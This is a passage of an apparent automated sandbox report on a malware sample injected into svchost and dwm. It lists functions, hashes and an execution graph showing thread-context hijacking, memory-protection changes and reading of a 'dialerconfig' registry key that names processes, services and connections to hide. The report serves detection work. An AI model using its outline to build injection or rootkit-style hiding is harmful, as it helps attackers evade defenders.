                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 71553aecd4e6c0be1a45bd4f8553e36c14cf70e2545c3f161416fa0a9a176b52
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 7F519272B002808BEB648F25A49C35977E8F356F86F1C4119DA8A67BE5CF7CD458C782
                                                        Function 000002A6612D8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 8201e1b19b336b27b06942c19ab8646d026c506d3e7787226ca7cd4a84cb06ae
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 4751AF32F112008BEB14CB15E40CB59379DFB52F98F9AA124DA064378CEF38D9C89706
                                                        Function 000002A6612D83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: cefbc8a046af985220aa2329bd1f73024f30a7703efedaf0860a35be415e2574
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 94317A35B1168097E7149B21E84C75937ACFB42F88F5A9018EE5A03788DF3CC988D706
                                                        Function 000002A661312058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: daab32c25a9fadadc3e1a32652520a2a78c62dababe1d4e9fdec7867a8e6883d
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 7AD1E332B14A808AE711CFB5D54939C3BB9F356B98F284215DE5AB7B99DF38C40AC341
                                                        Function 000002A6613014A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction ID: 921e1a85b60784aa0bba0433d9b0249e05675eea00effd83e5fc34bb76f58227
                                                        • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction Fuzzy Hash: D5118BB6A00AD0C7E714DFA2A80D25977B8F78AF85F084035EA4A23726DF7CC058C741
                                                        Function 000002A661312980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: f98e1d8c780189fb48322b240abb3135e65948d30303f15e17900ffbada13fd6
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 85918E72B1065486FB609F75994E3AD3BA8B747F98F284109DE0B77694DF38C48AC702
                                                        Function 000002A661307960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 1cc862d301829f27dd78957ba1fd8c5096fa0c01cbaac4e6f591e442f6dc95cb
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: 14111F32B10F418AEB409B60E8593A833B8F719B58F480D21DA6E57794DF7CC1988381
                                                        Function 000002A66130253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: a77167060b87a4fc452a4d9a47af32d2e27e7869f2a7b79b94de1e5e43e7598e
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 3571A436B0078147EA25DE35994C3AA67E8F386F95F580016DD0B63B89DF39C54DC782
                                                        Function 000002A6612D9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 4c1e01fd7d14f6ffb4a4eaa44a0f6dfd295677d667dd27de79d18e1f6fb3ebd9
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 21614832F00B848AEB20DF65D48879D77A8FB45B88F084216EF4917B99DF38D199C701
                                                        Function 000002A661302330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 8b65ca84562374e5dcff84955426101dcfa6df48021d4bc966f847153521bb2b
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 03519232B0478183E664DA39A65C3AAA6E9F386F41F4A0125DD5B33B59DF3DC50C87C2
                                                        Function 000002A6613126F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 435cc8df130a4e77d3710c788b2ddf4808abbc3271533ea666418ec5651f9c6f
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: E941E672B14A8087DB20DF25E94D3AA77A4F38AB94F584021EE4E97784DF7CC405C741
                                                        Function 000002A6613094A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: b3e6afc7812eff5d23d9e2531ddbd3c8dde3b3595130f4102b15f64d21df9287
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 5A115832604B8082EB218F15E448359B7E8FB89F94F1D4220EE8E17B68DF3CC555CB40
                                                        Function 000002A6612D7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 0f3f6b22aa811685f5e546128debed61f89d1e56892167602ce41c22e1950124
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: FDE04F65B50B8591DB028F62E8482D833A89B5AB64B489122D95C07311EB3CD2EDC301
                                                        Function 000002A6612D73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 93a3ced56bc647de6299b8a1905d2a6032edb69f7bc4320d41604ef82ca62c1f
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: AEE08666F10B4481DF028F71E4441D87368EB5AF54B8C9122C95C07311EF3CD2E9C301
                                                        Function 000002A661301BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 72cf71b4c8bcd0622c645fc165e77207b5f5e2b8a8cfb2fde8c47a753de635a3
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: FC115B75B01B8482EA04DB66A80D22A73E9EB8AFC5F1C4028DE4E67765DFBCC446C341
                                                        Function 000002A661301268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: b5369b631e5731d7a483f2840394a7dd6d44661382897b8f9f01a4c4ceb7f075
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 18E065B5B01A4487EB088FA2D80D34A36E5FB8AF06F09C024CD0A07361DFFD8499CB91

                                                        Execution Graph

                                                        Execution Coverage:1.7%
                                                        Dynamic/Decrypted Code Coverage:95.3%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:127
                                                        Total number of Limit Nodes:16
                                                        execution_graph 14920 2baaedf3ab9 14923 2baaedf3a06 14920->14923 14921 2baaedf3a70 14922 2baaedf3a56 VirtualQuery 14922->14921 14922->14923 14923->14921 14923->14922 14924 2baaedf3a8a VirtualAlloc 14923->14924 14924->14921 14925 2baaedf3abb GetLastError 14924->14925 14925->14921 14925->14923 14926 2baaedf28c8 14928 2baaedf290e 14926->14928 14927 2baaedf2970 14928->14927 14930 2baaedf3844 14928->14930 14931 2baaedf3851 StrCmpNIW 14930->14931 14932 2baaedf3866 14930->14932 14931->14932 14932->14928 14933 2baaedf5cf0 14934 2baaedf5cfd 14933->14934 14935 2baaedf5d09 14934->14935 14942 2baaedf5e1a 14934->14942 14936 2baaedf5d3e 14935->14936 14937 2baaedf5d8d 14935->14937 14938 2baaedf5d66 SetThreadContext 14936->14938 14938->14937 14939 2baaedf5e41 VirtualProtect FlushInstructionCache 14939->14942 14940 2baaedf5efe 14941 2baaedf5f1e 14940->14941 14955 2baaedf43e0 14940->14955 14951 2baaedf4df0 GetCurrentProcess 14941->14951 14942->14939 14942->14940 14945 2baaedf5f23 14946 2baaedf5f77 14945->14946 14947 2baaedf5f37 ResumeThread 14945->14947 14959 2baaedf7940 14946->14959 14948 2baaedf5f6b 14947->14948 14948->14945 14950 2baaedf5fbf 14952 2baaedf4e0c 14951->14952 14953 2baaedf4e53 14952->14953 14954 2baaedf4e22 VirtualProtect FlushInstructionCache 14952->14954 14953->14945 14954->14952 14957 2baaedf43fc 14955->14957 14956 2baaedf445f 14956->14941 14957->14956 14958 2baaedf4412 VirtualFree 14957->14958 14958->14957 14960 2baaedf7949 14959->14960 14961 2baaedf7954 14960->14961 14962 2baaedf812c IsProcessorFeaturePresent 14960->14962 14961->14950 14963 2baaedf8144 14962->14963 14966 2baaedf8320 RtlCaptureContext 14963->14966 14965 2baaedf8157 14965->14950 14967 2baaedf833a RtlLookupFunctionEntry 14966->14967 14968 2baaedf8389 14967->14968 14969 2baaedf8350 capture_previous_context 14967->14969 14968->14965 14969->14967 14969->14968 14970 2baaedf554d 14972 2baaedf5554 14970->14972 14971 2baaedf55bb 14972->14971 14973 2baaedf5637 VirtualProtect 14972->14973 14974 2baaedf5663 GetLastError 14973->14974 14975 2baaedf5671 14973->14975 14974->14975 14976 2baaedf1abc 14981 2baaedf1628 GetProcessHeap 14976->14981 14978 2baaedf1ad2 Sleep SleepEx 14979 2baaedf1acb 14978->14979 14979->14978 14980 2baaedf1598 StrCmpIW StrCmpW 14979->14980 14980->14979 14982 2baaedf1648 _invalid_parameter_noinfo 14981->14982 15026 2baaedf1268 GetProcessHeap 14982->15026 14984 2baaedf1650 14985 2baaedf1268 2 API calls 14984->14985 14986 2baaedf1661 14985->14986 14987 2baaedf1268 2 API calls 14986->14987 14988 2baaedf166a 14987->14988 14989 2baaedf1268 2 API calls 14988->14989 14990 2baaedf1673 14989->14990 14991 2baaedf168e RegOpenKeyExW 14990->14991 14992 2baaedf18a6 14991->14992 14993 2baaedf16c0 RegOpenKeyExW 14991->14993 14992->14979 14994 2baaedf16e9 14993->14994 14995 2baaedf16ff RegOpenKeyExW 14993->14995 15037 2baaedf12bc RegQueryInfoKeyW 14994->15037 14997 2baaedf1723 14995->14997 14998 2baaedf173a RegOpenKeyExW 14995->14998 15030 2baaedf104c RegQueryInfoKeyW 14997->15030 15001 2baaedf1775 RegOpenKeyExW 14998->15001 15002 2baaedf175e 14998->15002 15004 2baaedf1799 15001->15004 15005 2baaedf17b0 RegOpenKeyExW 15001->15005 15003 2baaedf12bc 13 API calls 15002->15003 15007 2baaedf176b RegCloseKey 15003->15007 15008 2baaedf12bc 13 API calls 15004->15008 15009 2baaedf17d4 15005->15009 15010 2baaedf17eb RegOpenKeyExW 15005->15010 15007->15001 15011 2baaedf17a6 RegCloseKey 15008->15011 15012 2baaedf12bc 13 API calls 15009->15012 15013 2baaedf1826 RegOpenKeyExW 15010->15013 15014 2baaedf180f 15010->15014 15011->15005 15015 2baaedf17e1 RegCloseKey 15012->15015 15017 2baaedf1861 RegOpenKeyExW 15013->15017 15018 2baaedf184a 15013->15018 15016 2baaedf104c 5 API calls 15014->15016 15015->15010 15022 2baaedf181c RegCloseKey 15016->15022 15020 2baaedf1885 15017->15020 15021 2baaedf189c RegCloseKey 15017->15021 15019 2baaedf104c 5 API calls 15018->15019 15023 2baaedf1857 RegCloseKey 15019->15023 15024 2baaedf104c 5 API calls 15020->15024 15021->14992 15022->15013 15023->15017 15025 2baaedf1892 RegCloseKey 15024->15025 15025->15021 15048 2baaee06168 15026->15048 15028 2baaedf1283 GetProcessHeap 15029 2baaedf12ae _invalid_parameter_noinfo 15028->15029 15029->14984 15031 2baaedf11b5 RegCloseKey 15030->15031 15032 2baaedf10bf 15030->15032 15031->14998 15032->15031 15033 2baaedf10cf RegEnumValueW 15032->15033 15035 2baaedf1125 _invalid_parameter_noinfo 15033->15035 15034 2baaedf114e GetProcessHeap 15034->15035 15035->15031 15035->15033 15035->15034 15036 2baaedf116e GetProcessHeap HeapFree 15035->15036 15036->15035 15038 2baaedf1327 GetProcessHeap 15037->15038 15039 2baaedf148a RegCloseKey 15037->15039 15042 2baaedf133e _invalid_parameter_noinfo 15038->15042 15039->14995 15040 2baaedf1476 GetProcessHeap HeapFree 15040->15039 15041 2baaedf1352 RegEnumValueW 15041->15042 15042->15040 15042->15041 15044 2baaedf13d3 GetProcessHeap 15042->15044 15045 2baaedf141e lstrlenW GetProcessHeap 15042->15045 15046 2baaedf1443 StrCpyW 15042->15046 15047 2baaedf13f3 GetProcessHeap HeapFree 15042->15047 15049 2baaedf152c 15042->15049 15044->15042 15045->15042 15046->15042 15047->15045 15050 2baaedf1546 15049->15050 15051 2baaedf157c 15049->15051 15050->15051 15052 2baaedf1565 StrCmpW 15050->15052 15053 2baaedf155d StrCmpIW 15050->15053 15051->15042 15052->15050 15053->15050 15054 2baaedc273c 15055 2baaedc276a 15054->15055 15056 2baaedc27c5 VirtualAlloc 15055->15056 15059 2baaedc28d4 15055->15059 15058 2baaedc27ec 15056->15058 15056->15059 15057 2baaedc2858 LoadLibraryA 15057->15058 15058->15057 15058->15059

                                                        Executed Functions

                                                        Function 000002BAAEDF1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: cc604fdf19191dbabe7159fc9bdb1041bbded78c0f78efac77444c2b15d6f476
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 1D712826350B11D6EB60DF66E88879933B5FB88B88F101125DE8E87F2ADF38C544C761
                                                        Function 000002BAAEDF3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: ffce113c4f51f2fcc8a35aca12e5c75aecb4ee8a21be27ed17485a1f1fe12a63
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 78112726704B4192EF689B21E40836973B4FB88B85F654029DE8D07B98EF3DC645C725
                                                        Function 000002BAAEDF5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 59 2baaedf5b30-2baaedf5b57 60 2baaedf5b59-2baaedf5b68 59->60 61 2baaedf5b6b-2baaedf5b76 GetCurrentThreadId 59->61 60->61 62 2baaedf5b78-2baaedf5b7d 61->62 63 2baaedf5b82-2baaedf5b89 61->63 66 2baaedf5faf-2baaedf5fc6 call 2baaedf7940 62->66 64 2baaedf5b9b-2baaedf5baf 63->64 65 2baaedf5b8b-2baaedf5b96 call 2baaedf5960 63->65 69 2baaedf5bbe-2baaedf5bc4 64->69 65->66 72 2baaedf5c95-2baaedf5cb6 69->72 73 2baaedf5bca-2baaedf5bd3 69->73 77 2baaedf5e1f-2baaedf5e30 call 2baaedf74bf 72->77 78 2baaedf5cbc-2baaedf5cdc GetThreadContext 72->78 75 2baaedf5bd5-2baaedf5c18 call 2baaedf85c0 73->75 76 2baaedf5c1a-2baaedf5c8d call 2baaedf4510 call 2baaedf44b0 call 2baaedf4470 73->76 88 2baaedf5c90 75->88 76->88 92 2baaedf5e35-2baaedf5e3b 77->92 81 2baaedf5ce2-2baaedf5d03 78->81 82 2baaedf5e1a 78->82 81->82 91 2baaedf5d09-2baaedf5d12 81->91 82->77 88->69 94 2baaedf5d14-2baaedf5d25 91->94 95 2baaedf5d92-2baaedf5da3 91->95 96 2baaedf5e41-2baaedf5e98 VirtualProtect FlushInstructionCache 92->96 97 2baaedf5efe-2baaedf5f0e 92->97 102 2baaedf5d27-2baaedf5d3c 94->102 103 2baaedf5d8d 94->103 106 2baaedf5e15 95->106 107 2baaedf5da5-2baaedf5dc3 95->107 104 2baaedf5ec9-2baaedf5ef9 call 2baaedf78ac 96->104 105 2baaedf5e9a-2baaedf5ea4 96->105 100 2baaedf5f10-2baaedf5f17 97->100 101 2baaedf5f1e-2baaedf5f2a call 2baaedf4df0 97->101 100->101 110 2baaedf5f19 call 2baaedf43e0 100->110 121 2baaedf5f2f-2baaedf5f35 101->121 102->103 112 2baaedf5d3e-2baaedf5d88 call 2baaedf3970 SetThreadContext 102->112 103->106 104->92 105->104 113 2baaedf5ea6-2baaedf5ec1 call 2baaedf4390 105->113 107->106 108 2baaedf5dc5-2baaedf5e10 call 2baaedf3900 call 2baaedf74dd 107->108 108->106 110->101 112->103 113->104 125 2baaedf5f77-2baaedf5f95 121->125 126 2baaedf5f37-2baaedf5f75 ResumeThread call 2baaedf78ac 121->126 128 2baaedf5fa9 125->128 129 2baaedf5f97-2baaedf5fa6 125->129 126->121 128->66 129->128
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                        • Instruction ID: 392e463944371945da43ea719fc9880e6036c71f4b1d6409742f5ca2829370fa
                                                        • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                        • Instruction Fuzzy Hash: 83D1BD36219B8886DB70DB0AE49835A7BB0F7C8B84F204616EACD47BA5DF3DC541CB51
                                                        Function 000002BAAEDF50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
